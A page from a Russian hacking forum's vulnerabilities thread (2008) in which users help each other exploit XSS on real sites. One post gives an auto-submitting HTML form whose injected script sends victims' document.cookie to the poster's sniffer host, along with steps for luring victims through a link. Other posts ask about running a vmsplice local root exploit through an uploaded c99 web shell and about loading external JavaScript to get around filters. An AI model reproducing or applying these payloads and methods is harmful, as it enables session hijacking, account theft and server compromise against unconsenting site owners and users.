HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 306 из 2438 « Первая < 206256296 302 303 304 305 306 307 308 309 310 3163564068061306 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #3051  
Старый 23.08.2008, 16:58
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию
Три поста назад отвечал на тот же вопрос
https://forum.antichat.ru/showpost.php?p=828862&postcount=3054
Тему лень смотреть?
 
Ответить с цитированием

  #3052  
Старый 23.08.2008, 17:10
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами: 9457097

Репутация: 133
По умолчанию
спс Ну как то да 307 страниц смотреть как то лениво !!!
поиск по форуму зделал не чего не нашел !хм.. оказываеться все так просто как сам не догадался post попробовать видать тупею )
Последний раз редактировалось MaSTeR GэN; 23.08.2008 в 17:12..
 
Ответить с цитированием

  #3053  
Старый 23.08.2008, 18:29
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию
Нашол я XSS. При реге я вставляю код в mail такой вот
><script>alert('XSS')</script>
Нажимаю "Зарегистрироваться" так он мне XSS вышибает (ну я не удивился)
Сами вопросы:
1-Почему я когда вставляю "><script>alert('XSS')</script> то в то поле каторое я вставил это (то есть в в поле маил) то туда выплевываеться(когда я нажал на кннопку "Зарегиться") след код

Код:
><script>alert('XSS')</script>>>          </td>       </tr>       <tr>         <td>           Секретный вопрос:         </td>         <td>           <INPUT size=40 maxlength=50 TYPE=TEXT NAME=question>          </td>       </tr>       <tr>         <td>           Секретный ответ:         </td>         <td>           <INPUT size=40 maxlength=50 TYPE=TEXT NAME=answer value=
В чем дело???

2-Как можно заюзать эту XSS??? она же токо при реге
Последний раз редактировалось diznt; 23.08.2008 в 18:39..
 
Ответить с цитированием

  #3054  
Старый 23.08.2008, 21:33
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию
diznt
это пасивка.. врятле ты стыриш чито куки с этой хсс... т.к. она при реге) куков то еще нету
 
Ответить с цитированием

  #3055  
Старый 24.08.2008, 00:01
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию
Цитата:
Сообщение от diznt  
Нашол я XSS. При реге я вставляю код в mail такой вот
><script>alert('XSS')</script>
Нажимаю "Зарегистрироваться" так он мне XSS вышибает (ну я не удивился)
Сами вопросы:
1-Почему я когда вставляю "><script>alert('XSS')</script> то в то поле каторое я вставил это (то есть в в поле маил) то туда выплевываеться(когда я нажал на кннопку "Зарегиться") след код

Код:
><script>alert('XSS')</script>>>          </td>       </tr>       <tr>         <td>           Секретный вопрос:         </td>         <td>           <INPUT size=40 maxlength=50 TYPE=TEXT NAME=question>          </td>       </tr>       <tr>         <td>           Секретный ответ:         </td>         <td>           <INPUT size=40 maxlength=50 TYPE=TEXT NAME=answer value=
В чем дело???

2-Как можно заюзать эту XSS??? она же токо при реге
Ссыль дай..

P.S sabe Не обяз......даже если так как ты думаешь....то можно составить скрипт..
 
Ответить с цитированием

  #3056  
Старый 24.08.2008, 01:38
login999
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
С нами: 9427413

Репутация: 973


По умолчанию
Привет, не подскажете, как запустить сплоит на повышение привилегий в Linux 2.6.22-gentoo-r8 , а то залил шелл (с99), пытаюсь запустить сплойт через шелл, никаких изменений, пытаюсь запустить через www , так показывает только текст сплоита, подскажите пожалуйста , сплоит пытался запустить Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit
 
Ответить с цитированием

  #3057  
Старый 24.08.2008, 01:54
funnyNe0
Новичок
Регистрация: 21.08.2008
Сообщений: 9
С нами: 9326661

Репутация: 0
По умолчанию
Цитата:
Сообщение от diznt  
Нашол я XSS. При реге я вставляю код в mail такой вот
><script>alert('XSS')</script>
Нажимаю "Зарегистрироваться" так он мне XSS вышибает (ну я не удивился)
Сами вопросы:
1-Почему я когда вставляю "><script>alert('XSS')</script> то в то поле каторое я вставил это (то есть в в поле маил) то туда выплевываеться(когда я нажал на кннопку "Зарегиться") след код

Код:
><script>alert('XSS')</script>>>          </td>       </tr>       <tr>         <td>           Секретный вопрос:         </td>         <td>           <INPUT size=40 maxlength=50 TYPE=TEXT NAME=question>          </td>       </tr>       <tr>         <td>           Секретный ответ:         </td>         <td>           <INPUT size=40 maxlength=50 TYPE=TEXT NAME=answer value=
В чем дело???

2-Как можно заюзать эту XSS??? она же токо при реге


ответ 1:

в поле выплевывает вышеописанную лабуду т.к. ломается html код. зайдя в исходник страницы ты сможешь увидеть почему это происходит (советую скачать например notepad++ он выделит цветом где в коде незакрытые тэги и т.д)

ответ 2

заюзать xss вполне реально и неважно в каком месте сайта оно находиться =) все что нужно это составить html страничку которая будет post запросом передавать полю email соответсвующие параметры. а потом впарить жертве ссылку на эту страницу.

вот ссылка на статью с примером такой странички. там впринципе все написанно достаточно подробно.

т.е ты на своем серваке ставишь:
1. снифер
2. страничку с специально сформированным html кодом.
после чего через личное сообщение,чат или другие средства общения на сайте впариваешь ссылку. человек идет по ссылке и куки твои.
 
Ответить с цитированием

  #3058  
Старый 24.08.2008, 02:08
funnyNe0
Новичок
Регистрация: 21.08.2008
Сообщений: 9
С нами: 9326661

Репутация: 0
По умолчанию
Вот кстати возникли проблеммы с данной процедурой получения кукисов.
нашел следующее xss на сайте.
в фотогалерее есть поле "текущая страница" (т.е. меняя значение в данном поле можно перемещаться по следующим страницам). при попытке поменять get параметры в адресной строке нарвался на фильтр
составил html код следующего вида

Код:
<html>  

<head>   
<meta http-equiv="content-type" content="text/html; charset=windows-1251" /> 
 </head>  
<body onLoad="document.REPLIER.submit();">  <h3>сейчас вы будете перенаправлены</h3> 
  <form action="http://хххх.ru/index.php?page=log" method="post" name="REPLIER" ">  
<input type='hidden' name='page' value=' "><script language="JavaScript">aa1 = new Image(); aa1.src="http://мой_сниффер/img.php?2222"+document.cookie;</script>'>  
</form>  
</body> 
 </html>
сниферить то сниферит но вот только без куков

т.е. в снифере остаеться ip и строка "2222"



пожалуйста подскажите почему в снифере не записываются куки и в чем моя ошибка?
 
Ответить с цитированием

  #3059  
Старый 24.08.2008, 09:47
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию
funnyNe0, скорее всего фильтруется символ "+".
 
Ответить с цитированием

  #3060  
Старый 24.08.2008, 10:00
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию
Цитата:
Сообщение от freddi  
funnyNe0, скорее всего фильтруется символ "+".
Тогда проше подгрузить js с другого сайта (<script src=), а там уже все сделать все, что надо.
 
Ответить с цитированием
Ответ
Страница 306 из 2438 « Первая < 206256296 302 303 304 305 306 307 308 309 310 3163564068061306 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.